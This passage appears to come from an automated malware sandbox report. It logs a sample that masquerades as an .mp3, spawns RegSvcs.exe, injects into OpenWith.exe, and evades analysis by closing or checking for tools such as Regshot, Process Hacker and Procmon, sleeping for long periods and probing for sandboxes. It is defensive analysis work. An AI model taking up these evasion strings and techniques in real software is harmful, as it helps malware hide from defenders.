Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: Yara match File source: Process Memory Space: qwlvpmrupf.mp3 PID: 7640, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: qwlvpmrupf.mp3.exe PID: 8072, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: qwlvpmrupf.mp3.exe PID: 8188, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: qwlvpmrupf.mp3.exe PID: 4092, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7940, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Windows\SysWOW64\OpenWith.exe API/Special instruction interceptor: Address: 7FFE2220D044
Source: C:\Windows\SysWOW64\OpenWith.exe API/Special instruction interceptor: Address: 5A6A83A
Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2076809860.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2079814695.00000000017FC000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076956481.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077127799.00000000017FC000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000002.2301475753.0000000001465000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE
Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2214116379.0000000001A34000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2214030847.0000000001A25000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215974566.0000000001A38000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2212858946.00000000019CD000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2216069254.0000000001A3A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213569719.00000000019D0000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000002.2217801117.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213912161.0000000001A20000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE)_M
Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2213298133.00000000019A3000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000002.2217573693.00000000019A5000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215926455.00000000019A5000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213000386.0000000001994000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215658045.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2214246439.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215081504.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2121860556.0000000001986000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")C
Source: qwlvpmrupf.mp3, 00000007.00000002.1953687346.0000000001073000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947073721.0000000001066000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1950281908.0000000001073000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947262131.000000000106A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1829676845.0000000001055000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1948261084.0000000001072000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1946884763.000000000105D000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2079423406.0000000001763000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1992063073.0000000001733000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2078136333.0000000001762000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2214116379.0000000001A34000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2214030847.0000000001A25000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215974566.0000000001A38000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2212858946.00000000019CD000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2216069254.0000000001A3A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213569719.00000000019D0000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000002.2217801117.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213912161.0000000001A20000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXESEQ
Source: qwlvpmrupf.mp3, 00000007.00000002.1953687346.0000000001073000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947073721.0000000001066000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1950281908.0000000001073000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947262131.000000000106A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1829676845.0000000001055000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1948261084.0000000001072000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1946884763.000000000105D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2076809860.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2079814695.00000000017FC000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076956481.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077127799.00000000017FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXEZ2
Source: qwlvpmrupf.mp3, 00000007.00000003.1947833274.0000000001097000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947073721.0000000001097000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1951093785.0000000001097000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1953739155.0000000001097000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1829676845.0000000001097000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2294338025.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2206751800.0000000001394000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2297587542.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2206906562.00000000013A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2294497605.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2294338025.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000002.2300827397.00000000013C3000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2294851662.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2296379791.00000000013C1000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2297015354.00000000013C2000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2206751800.0000000001394000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2206906562.00000000013A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")F
Source: qwlvpmrupf.mp3, 00000007.00000003.1948331020.000000000110E000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947692153.000000000110D000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1954130925.0000000001110000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947430431.0000000001109000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1951910362.000000000110E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXES
Source: OpenWith.exe, 0000000F.00000002.2945478445.0000000004EB0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ERE.EXEFIDDLER.EXEIDA.EX
Source: OpenWith.exe, 0000000F.00000002.2945478445.0000000004EB0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2076809860.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2079814695.00000000017FC000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076956481.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077127799.00000000017FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXES2
Source: qwlvpmrupf.mp3, 00000007.00000003.1948331020.000000000110E000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947692153.000000000110D000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1954130925.0000000001110000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947430431.0000000001109000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1951910362.000000000110E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE-
Source: qwlvpmrupf.mp3.exe, 00000013.00000002.2301475753.0000000001465000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXES7
Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2294497605.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2294338025.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000002.2300827397.00000000013C3000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2294851662.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2296379791.00000000013C1000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2297015354.00000000013C2000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2206751800.0000000001394000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2206906562.00000000013A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")Z
Source: OpenWith.exe, 0000000F.00000002.2945478445.0000000004EB0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OCEXP64.EXETCPVIEW.EXETCPVIEW64.EXEPROCMON.EXE
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000008255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")
Source: OpenWith.exe, 0000000F.00000002.2945478445.0000000004EB0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FIDDLER.EXE
Source: qwlvpmrupf.mp3, 00000007.00000003.1948331020.000000000110E000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947692153.000000000110D000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1954130925.0000000001110000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947430431.0000000001109000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1951910362.000000000110E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXEA
Source: qwlvpmrupf.mp3.exe, 00000010.00000002.2079423406.0000000001763000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1992063073.0000000001733000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2078136333.0000000001762000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076356702.0000000001750000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1992150517.0000000001744000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076501420.0000000001756000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2078498674.0000000001763000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")O
Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2213103873.0000000001988000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215757310.000000000198A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2216123247.000000000198D000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2121860556.0000000001986000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THENJ
Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2214116379.0000000001A34000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2214030847.0000000001A25000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215974566.0000000001A38000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2212858946.00000000019CD000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2216069254.0000000001A3A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213569719.00000000019D0000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000002.2217801117.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213912161.0000000001A20000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000002.2301475753.0000000001465000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXE
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
Source: qwlvpmrupf.mp3.exe, 00000010.00000003.1992063073.0000000001733000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076356702.0000000001750000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1992150517.0000000001744000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2079472285.0000000001766000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076669694.0000000001765000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076501420.0000000001756000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THENH
Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2213298133.00000000019A3000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213000386.0000000001994000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215658045.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2214246439.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215081504.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2121860556.0000000001986000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")+
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 API coverage: 5.7 %
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe API coverage: 5.4 %
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe TID: 3300 Thread sleep count: 68 > 30
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe TID: 3300 Thread sleep count: 191 > 30
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe TID: 3300 Thread sleep count: 94 > 30
